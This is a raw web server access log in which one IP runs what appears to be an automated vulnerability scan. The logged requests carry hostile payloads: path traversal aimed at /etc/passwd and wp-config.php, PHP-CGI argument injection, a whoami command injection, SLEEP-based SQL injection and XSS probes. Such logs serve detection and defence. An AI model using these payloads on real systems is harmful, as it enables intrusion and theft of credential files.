195.164.49.69 - - [18/Nov/2024:22:28:06 +0000] GET /.vscode/sftp.json HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:28:13 +0000] GET /config/pw_left_bar.html HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:28:19 +0000] POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:22:28:25 +0000] GET /nagiosxi/login.php HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:28:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:28:29 +0000] POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:28:31 +0000] POST /api/v2/open/rowsInfo HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:28:36 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:36 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:36 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:36 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:36 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:37 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:38 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:28:38 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:29:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:29:05 +0000] GET /geoserver/web/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:29:06 +0000] POST /geoserver/j_spring_security_check HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:29:09 +0000] POST /api/tokens HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:29:13 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [18/Nov/2024:22:29:17 +0000] GET /?echo+QOmtwfCNdF HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:29:19 +0000] GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:29:22 +0000] POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:29:22 +0000] POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:29:26 +0000] GET /user/login/ HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:29:29 +0000] GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:29:31 +0000] POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:30:12 +0000] POST /WebConfig/lua/auth.lua HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:30:13 +0000] POST /WebConfig/lua/auth.lua HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:30:20 +0000] GET /php_errors.log HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:30:20 +0000] GET /MyErrors.log HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:30:20 +0000] GET /admin/errors.log HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:30:20 +0000] GET /admin/error.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:30:20 +0000] GET /admin/logs/errors.log HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:30:21 +0000] GET /admin/logs/error.log HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:30:21 +0000] GET /admin/log/error.log HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:30:21 +0000] GET /application/logs/application.log HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:30:21 +0000] GET /application/logs/default.log HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:30:21 +0000] GET /logs/error.log HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:30:21 +0000] GET /config/error_log HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:30:21 +0000] GET /error.log HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /error.txt HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /error/error.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /error_log HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /error_log.txt HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /errors.log HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /errors.txt HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /errors/errors.log HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /errors_log HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:30:22 +0000] GET /log.log HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:30:23 +0000] GET /log.txt HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:30:23 +0000] GET /log/error.log HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:30:23 +0000] GET /log/errors.log HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:30:23 +0000] GET /logs.txt HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:30:36 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:30:37 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:30:37 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:30:37 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:30:37 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:30:37 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:30:38 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:30:38 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:30:42 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:30:42 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:30:42 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:30:42 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:30:42 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:30:42 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:30:42 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:30:43 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
83.212.98.101 - - [18/Nov/2024:22:30:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:30:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:30:58 +0000] GET /favicon.ico HTTP/1.1 200 21630
195.164.49.69 - - [18/Nov/2024:22:31:00 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:31:04 +0000] GET /pingmessages HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:31:05 +0000] POST /goform/formping HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:31:12 +0000] GET /UploadService/Page/ HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:31:14 +0000] GET /properties-list.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:31:18 +0000] POST /login_check.php HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:31:20 +0000] GET /wp-content/plugins/nextgen-gallery/readme.txt HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:22:31:22 +0000] GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:31:23 +0000] GET /logon/LogonPoint/index.html HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:31:26 +0000] GET /start.html HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:31:29 +0000] GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:31:31 +0000] GET /wp-admin/setup-config.php?step=1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:31:34 +0000] GET /sslvpn/Login/Login HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:31:36 +0000] GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html HTTP/1.1 404 1159
195.164.49.69 - - [18/Nov/2024:22:31:38 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:31:46 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:31:46 +0000] GET /routes/error_log HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:31:46 +0000] GET /sdc.iopan.pl:80/error.log HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:31:46 +0000] GET /sdc.iopan.pl:80/errors.log HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:31:46 +0000] GET /ws_ftp.log HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:31:48 +0000] GET /installation/index.php HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:31:51 +0000] GET /static/link/%2e%2e/etc/passwd HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:22:31:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:31:54 +0000] GET /api/v1/namespaces/default/workflows?query HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:31:58 +0000] GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:32:00 +0000] GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:32:02 +0000] GET /include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1107
- - - [18/Nov/2024:22:32:04 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:32:06 +0000] GET /api/v1/info HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:32:08 +0000] GET /properties-list.php?property-types=%27 HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:32:10 +0000] GET /auth/login HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:32:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:32:14 +0000] GET /accounts/login/ HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:32:16 +0000] GET /studio/login HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:32:18 +0000] GET /logon/LogonPoint/custom.html HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:32:20 +0000] GET /www/start.html HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:32:22 +0000] GET /web/database/manager HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:32:25 +0000] GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:32:26 +0000] GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:32:28 +0000] GET /Login/Login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:32:30 +0000] GET /phppgadmin/ HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:32:30 +0000] GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1 404 1198
195.164.49.69 - - [18/Nov/2024:22:32:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:32:36 +0000] GET /WS_FTP.LOG HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:32:38 +0000] GET /index.php?page=/etc/passwd HTTP/1.1 404 1083
83.212.98.101 - - [18/Nov/2024:22:32:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:32:40 +0000] GET /?c=../../../../../../etc/passwd%00 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:32:42 +0000] GET /cgi-bin/ExportAllSettings.sh HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:32:44 +0000] GET /cgi-bin/luci HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:32:46 +0000] GET /webconsole/webpages/login.jsp HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:32:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:32:50 +0000] GET /mailman/listinfo HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:32:52 +0000] GET /phpminiadmin.php HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:32:54 +0000] GET /AirWatch/Login HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:32:56 +0000] GET /favicon.ico HTTP/1.1 200 21630
195.164.49.69 - - [18/Nov/2024:22:32:58 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:33:00 +0000] GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:33:02 +0000] GET /git/notifyCommit?url=2p2f3J94LFmQHg42qJPkajtqvlI&branches=2p2f3J94LFmQHg42qJPkajtqvlI HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:33:04 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:33:06 +0000] GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:33:08 +0000] GET /welcome HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:33:10 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:33:12 +0000] GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:33:14 +0000] GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://sdc.iopan.pl:80/ecp HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:33:16 +0000] GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1 404 1198
195.164.49.69 - - [18/Nov/2024:22:33:16 +0000] GET /debug/pprof/heap?debug=1 HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:33:20 +0000] GET /lang/log/system.log HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:33:22 +0000] GET /Login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:33:23 +0000] GET /install HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:33:25 +0000] GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1 404 1151
195.164.49.69 - - [18/Nov/2024:22:33:27 +0000] GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:33:30 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:33:32 +0000] GET /phy.htm HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:33:33 +0000] GET /userportal/webpages/myaccount/login.jsp HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:33:34 +0000] GET /www/admin/index.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:33:37 +0000] GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:33:39 +0000] GET /listinfo HTTP/1.1 404 1082
- - - [18/Nov/2024:22:33:41 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:33:43 +0000] GET /appliance/login.ns HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:33:47 +0000] GET /LTX_navi.html HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:33:49 +0000] GET /enginemanager/ftu/welcome.htm HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:33:51 +0000] GET /webapi/v1/system/accountmanage/account HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:22:33:53 +0000] GET /otobo/index.pl HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:33:55 +0000] GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:33:57 +0000] GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:33:59 +0000] GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:34:02 +0000] GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:34:03 +0000] GET /static/../../../a/../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:34:05 +0000] GET /pprof/heap?debug=1 HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:34:07 +0000] GET /__clockwork/app HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:34:09 +0000] GET /vkd/GetWelcomeScreen.event HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:34:11 +0000] GET /manager/login.aspx HTTP/1.1 404 1547
195.164.49.69 - - [18/Nov/2024:22:34:13 +0000] GET /storage/logs/laravel.log HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:34:15 +0000] GET /nagioslogserver/install HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:34:17 +0000] GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:34:19 +0000] GET /admin/airflow/login HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:34:21 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:34:23 +0000] GET /admin/index.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:34:25 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:34:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:34:29 +0000] GET /global-protect/login.esp HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:34:31 +0000] GET /log/production.log HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:34:33 +0000] GET /ajax-api/2.0/preview/mlflow/experiments/get?experiment_id=0 HTTP/1.1 404 1137
195.164.49.69 - - [18/Nov/2024:22:34:35 +0000] GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:34:37 +0000] GET /plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:22:34:39 +0000] GET /render/info.html HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:34:41 +0000] GET /arcgis/rest/services HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:34:43 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:34:45 +0000] GET /web/login HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:34:47 +0000] GET /?q=../../../etc/passwd&s=../../../etc/passwd&search=../../../etc/passwd&id&action=../../../etc/passwd&keyword=../../../etc/passwd&query=../../../etc/passwd&page=../../../etc/passwd&keywords=../../../etc/passwd&url=../../../etc/passwd&view=../../../etc/passwd&cat=../../../etc/passwd&name=../../../etc/passwd&key=../../../etc/passwd&p=../../../etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:34:50 +0000] GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:34:51 +0000] GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:34:52 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:34:54 +0000] GET /__clockwork/latest HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:34:57 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:34:59 +0000] GET /images/../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:35:01 +0000] GET /GDSHost/Default.aspx HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:35:03 +0000] GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:35:05 +0000] GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:35:06 +0000] GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:35:09 +0000] GET /debug/pprof/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:35:11 +0000] GET /ui/login.action HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:35:14 +0000] GET /sidekiq HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:35:14 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:35:16 +0000] GET /arsys/shared/login.jsp HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:35:18 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:35:20 +0000] GET /logs/production.log HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:35:22 +0000] GET /crowd/console/login.action HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:22:35:24 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:35:26 +0000] GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:22:35:28 +0000] GET /admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:35:30 +0000] GET /manager/html HTTP/1.1 401 2499
195.164.49.69 - - [18/Nov/2024:22:35:32 +0000] GET /names.nsf HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:35:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:35:36 +0000] GET /?q=../../../etc/passwd%00&s=../../../etc/passwd%00&search=../../../etc/passwd%00&id=../../../etc/passwd%00&action=../../../etc/passwd%00&keyword=../../../etc/passwd%00&query=../../../etc/passwd%00&page=../../../etc/passwd%00&keywords=../../../etc/passwd%00&url=../../../etc/passwd%00&view=../../../etc/passwd%00&cat=../../../etc/passwd%00&name=../../../etc/passwd%00&key=../../../etc/passwd%00&p=../../../etc/passwd%00 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:35:39 +0000] GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 404 1111
